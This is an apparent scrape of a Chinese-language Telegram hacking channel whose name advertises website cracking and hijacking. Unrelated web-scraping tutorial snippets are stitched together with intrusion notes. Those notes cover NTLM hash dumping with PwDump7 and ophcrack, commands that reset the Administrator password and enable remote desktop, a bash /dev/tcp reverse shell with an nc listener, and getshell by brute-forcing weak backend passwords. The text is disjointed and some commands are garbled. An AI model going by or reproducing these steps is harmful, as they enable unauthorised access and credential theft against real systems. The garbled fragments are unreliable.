网站破解权限 渗透劫持 黑客数据
5.01K subscribers
572 photos
1 video
51 links
Download Telegram
,下面我们就先用一个实例来说明一下爬虫的过程,当然这是一个非常简单的小案例,如果将来想要更加复杂的目标,涉及的技术就多了。 最近关注银行股,想要获取某一只银行股当前的市盈率是多少,这就是我们的目标了。这里我们用requests+xpath来实现

首先,我们的信息源是东方财富网,以浦发银行[代码:sh600000]为例
最后爬取不同城市的详细真实IT招聘岗位数据大约70万条,爬的时间也挺久
selenium爬取招聘岗位详细信息并进行数据清洗,这里我的chromedriver.exe版本是v110,一定选择浏览器所兼容支持的版本号。
系统展示
启动项目进入系统
http://127.0.0.1:8080/login.html
非开发岗我这里爬取了3个,想爬取更多岗位,可以直接修改爬虫代码里面参数信息就行
1、解析初始界面数据

2、获取到每个每个PPT对应的li节点

3、获取对应PPT模板的链接和名字

4、进入每个PPT模板的详情界面

5、解析界面

6、获取PPT模板下载页面的链接

7、进入下载页面

8、解析界面获取下载链接

9、完成PPT模板的下载
腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
更多
文章/答案/技术大牛
搜索
发布
社区首页
>
专栏
>
Python素材下载爬虫,ui素材下载爬取采集源码
Python素材下载爬虫,ui素材下载爬取采集源码
发布于 2020-07-22 14:27:52
2.3K0
举报
文章被收录于专栏:
二爷记
Uimaker是为UI设计师提供学UI设计的专业UI平台,拥有UI教程、UI素材、ICON、图标设计UI、手机UI、ui设计师招聘、软件界面设计、后台界面、后台模版等相关内容,快来uimaker学UI设计。

目标网站:

http://www.uimaker.com/uimakerdown/list_36_1.html
某音频网站,在这个网站当中,数据主要以音频为主。那么我们想要爬取网站上面的音频数据该如何去做
在这段话里面有一个关键点就是无需加载整个网页,就可以更新部分网页的技术 例如下面是一个12306的车次列表
getpass被杀, 可以使用PwDump7.exe或者QuarksPwDump.exe得到密码的NTML哈希值,然后再去各种MD5网站解密
如果得到密码的NTML哈希无法破解,可以采用彩虹表爆破的方式,爆破出Administrator的密码:保存扫描出的NTML哈希值-使用ophcrack(去官网下载字典库https://ophcrack.sourceforge.io/tables.php)梭哈一下。
whoami是www-data权限,很低的权限pwd可查看到当前路径且判定是linux系统s-al查看了下当前目录下的读写执行权限
1.whoami//查询当前用户权限
2.netuser//查着系统用户
3.netuserAdministratorpte//修改Administrator用户密码为pte
4.reg add “HKLMISYSTEMICurrentControlSetiControlTerminal Server /v fDenyTSConnections /t reg_dword /d 0/f/开启3389远程终端
5.win7/win8/win10:REG query HKLMISYSTEMCurrentControlSetControllTerminal “ServerWinStationsRDP-Tcp /y PortNumbewinxp/win2003:REG query HKLMISYSTEMICurrentControlSetControlTerminar ServerWdsrdpwdTdstcp /v PortNumber //查询3389远程服务端口
6.使用Administrator用户及新修改的密码远程登陆系统,做你想做的-
可以看出其他用户是没有高权限的,写入执行权限都没有,就不能在当前目录下写马;经尝试,bash反弹shell未能成功
bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面
>:重定向
/dev/tcp:调用建立一个socket连接
127.0.0.1:可以任意更改需要反弹到的IP地址
2345:反弹到的端口

上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到
攻击机使用 nc -lvp 2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令
数据库后台权限getshell
通过爆破弱口令登录到后台
1. 查看数据库版本
在查看日志状态 off没有开启 保存路径在 *@#*@*#@.log
发现 网站是phpstudy搭建 所以网站的路径在D:\phpstudy\www\ 下